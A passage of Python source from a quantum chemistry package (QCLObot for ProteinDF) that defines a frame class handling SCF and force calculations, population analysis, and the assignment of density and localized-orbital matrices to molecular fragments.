# calc from the molecule data
num_of_electrons = self.frame_molecule.sum_of_atomic_number()
logger.info(
"{header} the number of electrons = {elec}".format(
header=self.header, elec=num_of_electrons
)
)
if self.charge != 0:
logger.info("specify the charge => {}".format(self.charge))
num_of_electrons -= self.charge # 電子(-)数と電荷(+)の正負が逆なことに注意
self.pdfparam.num_of_electrons = num_of_electrons
logger.info(
"{header} update the number of electrons => {elec}".format(
header=self.header, elec=self.pdfparam.num_of_electrons
)
)
if self.pdfparam.num_of_electrons % 2 != 0:
logger.warning(
"{header} the number of electrons is not even.".format(
header=self.header
)
)
# ------------------------------------------------------------------
def calc_preSCF(self, dry_run=False):
""" """
if self.is_finished_prescf:
logger.info("preSCF has been calced.")
return
self.cd_work_dir("calc preSCF")
self.check_bump_of_atoms()
self._setup_pdf()
self.pdfparam.step_control = "integral"
self.save()
pdfsim = pdf.PdfSim()
pdfsim.sp(
self.pdfparam,
workdir=self.work_dir,
db_path=self.db_path,
dry_run=dry_run,
cmd_archive=self._cmds["archive"],
)
self._cache.pop("pdfparam")
self.is_finished_prescf = True
self.save()
self.restore_cwd()
# sp ---------------------------------------------------------------
def calc_sp(self, dry_run=False):
"""
calculate single point energy
"""
if self.is_finished_scf:
logger.info("SP has been calced.")
self._grouping_fragments()
self._switch_fragments()
return
if self.is_finished_prescf != True:
self.calc_preSCF(dry_run)
self.cd_work_dir("calc SP")
self.check_bump_of_atoms()
self._setup_pdf()
# self.output_xyz("{}/model.xyz".format(self.name))
self.pdfparam.step_control = "guess scf"
self.save()
pdfsim = pdf.PdfSim()
pdfsim.sp(
self.pdfparam,
workdir=self.work_dir,
db_path=self.db_path,
dry_run=dry_run,
cmd_archive=self._cmds["archive"],
)
self._cache.pop("pdfparam")
self.is_finished_scf = True
self._grouping_fragments()
self._switch_fragments()
self.save()
self.restore_cwd()
# gradieng ----------------------------------------------------------------
def calc_force(self, dry_run=False):
"""
calculate force (energy gradient)
absolute: force -> gradient
"""
if self.is_finished_force:
logger.info("force has been calced.")
return
if self.is_finished_scf != True:
self.calc_sp(dry_run)
self.cd_work_dir("calc force")
self._setup_pdf()
self.pdfparam.step_control = "force"
self.save()
pdfsim = pdf.PdfSim()
# for frg_name, frg in self.fragments():
# frg.set_basisset(self.pdfparam)
# self.pdfparam.molecule = self.frame_molecule
#
# # num_of_electrons
# num_of_electrons = self.pdfparam.num_of_electrons # calc from the molecule data
# logger.info('the number of electrons = {}'.format(num_of_electrons))
# if self.charge != 0:
# logger.info('specify the charge => {}'.format(self.charge))
# num_of_electrons -= self.charge # 電子(-)数と電荷(+)の正負が逆なことに注意
# self.pdfparam.num_of_electrons = num_of_electrons
# logger.info('update the number of electrons => {}'.format(self.pdfparam.num_of_electrons))
pdfsim.sp(
self.pdfparam,
workdir=self.work_dir,
db_path=self.db_path,
dry_run=dry_run,
cmd_archive=self._cmds["archive"],
)
self._cache.pop("pdfparam")
self.is_finished_force = True
self.save()
self.restore_cwd()
# summary ------------------------------------------------------------------
def summary(self, dry_run=False, format_str=None, filepath=None):
"""
Format:
{NUM_OF_ATOMS}: number of atoms
{NUM_OF_AO}: number of AOs
{NUM_OF_MO}: number of MOs
{METHOD}: method
{IS_CONVERGED}: Whether the SCF is converged or not
{ITERATION}: iteration
{TOTAL_ENERGY}: total energy
{GRADIENT_RMS}: gradient RMS
"""
if self.is_finished_scf != True:
self.calc_sp(dry_run)
self.cd_work_dir("summary")
values = {}
pdfarc = self.get_pdfarchive()
values["NUM_OF_ATOMS"] = pdfarc.num_of_atoms
values["NUM_OF_AO"] = pdfarc.num_of_AOs
values["NUM_OF_MO"] = pdfarc.num_of_MOs
values["METHOD"] = pdfarc.method
values["IS_CONVERGED"] = pdfarc.scf_converged
itr = pdfarc.iterations
values["ITERATION"] = itr
values["TOTAL_ENERGY"] = pdfarc.get_total_energy(itr)
values["GRADIENT_RMS"] = pdfarc.get_gradient_rms()
if format_str == None:
format_str = "total energy: {TOTAL_ENERGY} at {ITERATION}"
output = format_str.format(**values)
if output[-1] != "\n":
output += "\n"
logger.info(output)
if filepath != None:
with open(filepath, "a") as f:
f.write(output)
self.restore_cwd()
return output
def get_gradient(self):
""" """
self.cd_work_dir("get_gradient")
pdfarc = self.get_pdfarchive()
num_of_atoms = pdfarc.num_of_atoms
grad = [[] * num_of_atoms]
for atom_index in range(num_of_atoms):
grad[atom_index] = pdfarc.get_force(atom_index)
self.restore_cwd()
# pop --------------------------------------------------------------
def pop(self, dry_run=False, iteration=-1):
""" """
if self.is_finished_scf != True:
self.calc_sp(dry_run)
if iteration == -1:
iteration = self.pdfparam.iterations
self._calc_pop(iteration=iteration)
pop_vtr = self.get_pop(iteration)
self.save()
self.restore_cwd()
return pop_vtr
def _calc_pop(self, iteration=-1, dry_run=False):
""" """
if iteration == -1:
iteration = self.pdfparam.iterations
self.cd_work_dir("calc pop: iteration={}".format(iteration))
pdfsim = pdf.PdfSim()
pdfsim.pop(iteration=iteration, dry_run=dry_run)
self.restore_cwd()
def get_pop(self, iteration=-1):
""" """
if iteration == -1:
iteration = self.pdfparam.iterations
self.cd_work_dir("get pop: iteration={}".format(iteration))
run_type = "rks"
pop_path = self.pdfparam.get_pop_mulliken_path(run_type, iteration=iteration)
pop_vtr = pdf.Vector()
pop_vtr.load(pop_path)
self.restore_cwd()
return pop_vtr
# ==================================================================
# PICKUP
# ==================================================================
# pickup density matrix --------------------------------------------
def pickup_density_matrix(self, runtype="rks"):
"""
密度行列を各フラグメントに割り当てる
"""
if self.is_finished_pickup_density_matrix:
logger.info(
"{header} pickup density matrix has done.".format(header=self.header)
)
return
self.cd_work_dir("pickup density matrix")
# post-SCF
self._grouping_fragments()
self._switch_fragments()
dens_mat_path = self.pdfparam.get_density_matrix_path(runtype=runtype)
logger.info(
"{header} reference density matrix: {path}".format(
header=self.header, path=dens_mat_path
)
)
global_dim = 0
for frg_name, frg in self.fragments():
dim = frg.get_number_of_AOs()
if dim > 0:
frg_dens_mat_path = "Ppq.{}.{}.mat".format(runtype, frg_name)
logger.info(
"{header} select [{start}:{end}] for {fragment}".format(
header=self.header,
fragment=frg_name,
start=global_dim,
end=global_dim + dim - 1,
)
)
# フラグメント対応部分を切り出す
pdf.run_pdf(
[
self._cmds["mat-select"],
"-t",
global_dim,
"-l",
global_dim,
"-b",
global_dim + dim - 1,
"-r",
global_dim + dim - 1,
dens_mat_path,
frg_dens_mat_path,
]
)
# select された行列を対称行列に変換
pdf.run_pdf(
[self._cmds["mat-symmetrize"], frg_dens_mat_path, frg_dens_mat_path]
)
logger.debug(
"{header} density matrix for {fragment} was saved as {path}".format(
header=self.header, fragment=frg_name, path=frg_dens_mat_path
)
)
is_loadable = pdf.SymmetricMatrix.is_loadable(frg_dens_mat_path)
assert is_loadable == True
(row, col) = pdf.SymmetricMatrix.get_size(frg_dens_mat_path)
assert row == dim
assert row == col
# 対称行列パスをフラグメントに登録
frg.set_density_matrix(frg_dens_mat_path)
global_dim += dim
logger.is_finished_pickup_density_matrix = True
self.save()
self.restore_cwd()
# ------------------------------------------------------------------
def calc_lo(self, run_type, force=False, dry_run=False):
if (self.is_finished_LO == True) and (force == False):
logger.info("LO has done.")
return
if self.is_finished_scf != True:
self.calc_sp(dry_run=dry_run)
self.cd_work_dir("calc lo")
# make atom groups for LO
fragments_atom_ids_path = "fragments_atom_id.mpac"
fragments_atom_ids = self.fragments_atom_ids
logger.info("save fragment atom ids as {}".format(fragments_atom_ids_path))
bridge.save_msgpack(fragments_atom_ids, fragments_atom_ids_path)
logger.info("start lo calculation.")
pdf.run_pdf(self._cmds["lo"])
self.is_finished_LO = True
self.save()
self.restore_cwd()
# ------------------------------------------------------------------
def pickup_QCLO_matrix(self, run_type="rks", force=False):
if (self.is_finished_pickup_LO == True) and (force == False):
logger.info("pickup LO has been finished.")
return
self.calc_lo(run_type, force)
self.cd_work_dir("pickup lo")
# post-SCF
self._grouping_fragments()
self._switch_fragments()
# debug
logger.debug("pickup_QCLO_matrix frame: {}".format(self._name))
pdfarc = self.get_pdfarchive()
num_of_AOs = pdfarc.num_of_AOs
num_of_MOs = pdfarc.num_of_MOs
HOMO_level = pdfarc.get_HOMO_level("rks") # option base 0
logger.info("num of AOs: {}".format(num_of_AOs))
logger.info("num of MOs: {}".format(num_of_MOs))
logger.info("HOMO level: {}".format(HOMO_level + 1))
logger.info("fragment information:")
for frg_name, frg in self.fragments():
frg_AOs = frg.get_number_of_AOs()
logger.info("fragment name:[{}] AOs={}".format(frg_name, frg_AOs))
logger.info("")
# calc S*C
if "pdfparam" in self._cache:
self._cache.pop("pdfparam")
lo_satisfied = self.pdfparam.lo_satisfied
if lo_satisfied != True:
logger.warn("lo_satisfied: {}".format(lo_satisfied))
lo_iterations = self.pdfparam.lo_num_of_iterations
logger.info("lo iterations: {}".format(lo_iterations))
logger.info("calc S*C")
CSC_path = "CSC.mat"
Clo_path = self.pdfparam.get_clo_mat_path()
pdf.run_pdf(["component", "-v", "-S", "CSC.mat", "-c", Clo_path])
# load CSC
CSC = pdf.Matrix()
CSC.load(CSC_path)
logger.info("{header} make AO v.s. fragment table".format(header=self.header))
AO_frg_tbl = self._get_AO_fragment_table(num_of_AOs)
# pickup
logger.info(
"{header} assign fragment: start: HOMO={homo}".format(
header=self.header, homo=HOMO_level
)
)
MO_fragment_assigned = {}
for mo in range(HOMO_level + 1):
frg_name = self._define_lo_fragment(mo, num_of_AOs, AO_frg_tbl, CSC)
logger.info(
"{header} #{mo} MO -> fragment: '{frg_name}'".format(
header=self.header, mo=mo, frg_name=frg_name
)
)
MO_fragment_assigned.setdefault(frg_name, [])
MO_fragment_assigned[frg_name].append(mo)
logger.info("{header} assign fragment: end".format(header=self.header))
# assign report
logger.info("==== assign report ====")
for k, MOs in MO_fragment_assigned.items():
logger.info(
"{header} fragment '{frag_name}' has {mo} MO(s)".format(
header=self.header, frag_name=k, mo=len(MOs)
)
)
# フラグメントのC_LOを作成する
logger.info("{header} create C_LO: start".format(header=self.header))
Clo = pdf.Matrix()
Clo.load(Clo_path)
assert num_of_AOs == Clo.rows
for frg_name, frg in self.fragments():
frg_cols = len(MO_fragment_assigned.get(frg_name, []))
logger.info(
"{header} fragment '{frg_name}': col={col}".format(
header=self.header, frg_name=frg_name, col=frg_cols
)
)
if frg_cols == 0:
logger.warning(
"{header} fragment '{frg_name}' has no colomns.".format(
header=self.header, frg_name=frg_name
)
)
# continue
Clo_frg = pdf.Matrix(num_of_AOs, frg_cols)
if frg_name in MO_fragment_assigned:
for col, ref_col in enumerate(MO_fragment_assigned[frg_name]):
for row in range(num_of_AOs):
v = Clo.get(row, ref_col)
Clo_frg.set(row, col, v)
Clo_path = "Clo_{}.mat".format(frg_name)
logger.debug(
"{header} fragment C_LO save: {path}".format(
header=self.header, path=Clo_path
)
)
Clo_frg.save(Clo_path)
frg.set_LO_matrix(Clo_path, run_type)
logger.info("{header} create C_LO: end".format(header=self.header))
# trans C_LO to QCLO
self._trans_LO2QCLO()
# finish
self.is_finished_pickup_LO = True
self.save()
self.restore_cwd()
def _get_AO_fragment_table(self, num_of_AOs):
"""
AO v.s. fragment_name の辞書を返す
"""
frg_table = [None for x in range(num_of_AOs)]
AO_index = 0
for frg_name, frg in self.fragments():
frg_num_of_AOs = frg.get_number_of_AOs()
for i in range(AO_index, AO_index + frg_num_of_AOs):
frg_table[i] = frg_name
AO_index += frg_num_of_AOs
return frg_table
def _define_lo_fragment(self, mo, num_of_AOs, AO_frg_tbl, CSC):
judge = {}
total = 0.0
for ao in range(num_of_AOs):
frg_name = AO_frg_tbl[ao]
v = math.fabs(CSC.get(ao, mo))
total += v
judge.setdefault(frg_name, 0.0)
judge[frg_name] += v
for frg_name in judge.keys():
judge[frg_name] /= total
ranked_judge = sorted(judge.items(), key=lambda x: x[1], reverse=True)
for rank, (k, v) in enumerate(ranked_judge):
logger.info(
"{header} [{rank}] name:{name}, score:{score:.3f}".format(
header=self.header, rank=rank + 1, name=k, score=v
)
)
high_score = ranked_judge[0][1]
if high_score < 0.5:
logger.warning(
"{header} 1st score is too small: {score}".format(
header=self.header, score=high_score
)
)
return ranked_judge[0][0]
def _trans_LO2QCLO(self):
logger.info("trans LO at {}".format(os.getcwd()))
run_type = "rks"
F_path = self.pdfparam.get_f_mat_path(run_type)
logger.info("F matrix: {}".format(F_path))
for frg_name, frg in self.fragments():
C_QCLO_path = "C_QCLO.{}.mat".format(frg_name) # output for each fragment
frg_AO = frg.get_number_of_AOs()
logger.info(
"{header} fragment '{name}' has {ao} AO(s)".format(
header=self.header, name=frg_name, ao=frg_AO
)
)
if frg.get_number_of_AOs() != 0:
Clo_path = frg.get_LO_matrix_path(run_type)
assert Clo_path != None
# calc (C_LO)dagger * F * C_LO => F'
F_Clo_path = "F_Clo.{}.mat".format(frg_name)
pdf.run_pdf([self._cmds["mat-mul"], "-v", F_path, Clo_path, F_Clo_path])
Clo_dagger_path = "Clo_dagger.{}.mat".format(frg_name)
pdf.run_pdf(
[self._cmds["mat-transpose"], "-v", Clo_path, Clo_dagger_path]
)
F_prime_path = "Fprime.{}.mat".format(frg_name)
pdf.run_pdf(
[
self._cmds["mat-mul"],
"-v",
Clo_dagger_path,
F_Clo_path,
F_prime_path,
]
)
pdf.run_pdf([self._cmds["mat-symmetrize"], F_prime_path, F_prime_path])
# diagonal F'
eigval_path = "QCLO_eigval.{}.vtr".format(frg_name)
Cprime_path = "Cprime.{}.mat".format(frg_name)
logger.info("diagonal F'")
pdf.run_pdf(
[
self._cmds["mat-diagonal"],
"-v",
"-l",
eigval_path,
"-x",
Cprime_path,
F_prime_path,
]
)
# AO基底に変換
pdf.run_pdf(
[self._cmds["mat-mul"], "-v", Clo_path, Cprime_path, C_QCLO_path]
)
else:
logger.info(
"{header} create empty QCLO matrix.".format(header=self.header)
)
empty_mat = pdf.Matrix()
empty_mat.save(C_QCLO_path)
frg.set_QCLO_matrix(C_QCLO_path)
logger.info("C_QCLO saved: {}".format(C_QCLO_path))
# =================================================================
# for fragments
# =================================================================
def fragments(self):
"""
フラグメントの名前とオブジェクトを返すイテレータ
"""
for k in self._fragments.keys():
yield (k, self._fragments[k])
def has_fragment(self, fragment_name):
"""
フラグメントを持っていればTrueを返す
"""
fragment_name = bridge.StrUtils.to_unicode(fragment_name)
return fragment_name in self._fragments.keys()
# operator[] -------------------------------------------------------
def __getitem__(self, fragment_name):
"""
出力用[]演算子
"""
fragment_name = bridge.StrUtils.to_unicode(fragment_name)
return self._fragments.get(fragment_name, None)
def __setitem__(self, fragment_name, obj):
"""
入力用[]演算子
計算前であれば代入可能(つまりモデリング中)であるが、
計算後は代入できない
"""
if self.is_finished_scf:
logger.debug("rearrangement of fragments is prohibited after calculation.")
return
if "frame_molecule" in self._cache:
self._cache.pop("frame_molecule")
fragment_name = bridge.StrUtils.to_unicode(fragment_name)
if isinstance(obj, QcFragment):
fragment = QcFragment(obj)
fragment.parent = self
fragment.name = fragment_name
logger.debug(
"[{my_name}] add fragment: name={fragment_name}".format(
my_name=self.name, fragment_name=fragment_name
)
)
self._fragments[fragment_name] = fragment
elif isinstance(obj, QcFrame):
logger.info(
"begin to register frame molecule: for {}".format(fragment_name)
)
fragment = QcFragment()
fragment.parent = self
fragment.name = fragment_name
for k, f in obj.fragments():
if not f.margin:
logger.warn(
"add fragment: fragment={} for {}".format(k, fragment_name)
)
fragment.set_group(k, f)
else:
logger.warn("pass fragment: fragment={} is margin".format(k))
self._fragments[fragment_name] = fragment
logger.info(
"end of registration frame molecule: for {}".format(fragment_name)
)
else:
raise
# rearrangement -----------------------------------------------------------
def _switch_fragments(self):
"""
fragmentsを入力用から出力用に切り替える
処理内容:
- 各fragmentの親を自分(self)にする
"""
logger.info("{header} switch fragment".format(header=self.header))
output_fragments = OrderedDict()
for frg_name, frg in self.fragments():
logger.info(
"{header} fragment_name: {name}".format(
header=self.header, name=frg_name
)
)
new_frg = QcFragment(frg, parent=self)
assert new_frg.parent.name == self.name
output_fragments[frg_name] = new_frg
self._fragments = output_fragments
# logger.info('merge subgroups')
# for key, frg in self.fragments():
# frg.merge_subgroups()
logger.info("{header} ---> switch".format(header=self.header))
for frg_name, frg in self.fragments():
logger.info(
"{header} {frg_name}: parent={parent_name}".format(
header=self.header, frg_name=frg_name, parent_name=frg.parent.name
)
)
logger.info("{header} <---".format(header=self.header))
def _grouping_fragments(self):
logger.info("{header} grouping fragments".format(header=self.header))
for frg_name, frg in self.fragments():
frg.grouping_subfragments()
# ==================================================================
# coordinates
# ==================================================================
# outout XYZ -------------------------------------------------------
def output_xyz(self, file_path):
xyz = bridge.Xyz(self.frame_molecule)
xyz.save(file_path)
def check_bump_of_atoms(self):
logger.info("{header} check bump of atoms".format(header=self.header))
atom_list = self.frame_molecule.get_atom_list()
num_of_atoms = len(atom_list)
for i in range(num_of_atoms):
xyz1 = atom_list[i].xyz
for j in range(i):
d = xyz1.distance_from(atom_list[j].xyz)
if d < self.TOO_SMALL:
logger.warning(
"{header} atom[{i}][{atom_i}]({atom_i_path}) is near by atom[{j}][{atom_j}]({atom_j_path})".format(
header=self.header,
i=i,
atom_i=str(atom_list[i]),
atom_i_path=atom_list[i].path,
j=j,
atom_j=str(atom_list[j]),
atom_j_path=atom_list[j].path,
)
)
logger.debug("{header} check_bump of atoms: end".format(header=self.header))
# ==================================================================
# orbital table
# ==================================================================
def get_orbital_info(self):
"""
AOに対するQcOrbitalDataリストを返す
"""
orbinfo = []
for k, frg in self.fragments():
orbinfo.extend(frg.get_orbital_info())
return orbinfo
# ==================================================================
# operators
# ==================================================================
# operator == ------------------------------------------------------
def __eq__(self, rhs):
if rhs == None:
return False
return self.name == rhs.name
def __ne__(self, rhs):
return not self.__eq__(rhs)
# operator str -----------------------------------------------------
def __str__(self):
answer = ""
answer = "frame name={}\n".format(self.name)
for key, fragment in self.fragments():
answer += ">> fragment: {}\n".format(key)
answer += str(fragment)
answer += "\n"
return answer
# ==================================================================
# debug
# ==================================================================
def _get_logger_header(self):
"""return header string for logger"""
header = "{name}>".format(name=self.name)
return header
header = property(_get_logger_header)
|
ProteinDF/QCLObot
|
qclobot/qcframe.py
|
Python
|
gpl-3.0
| 48,942
|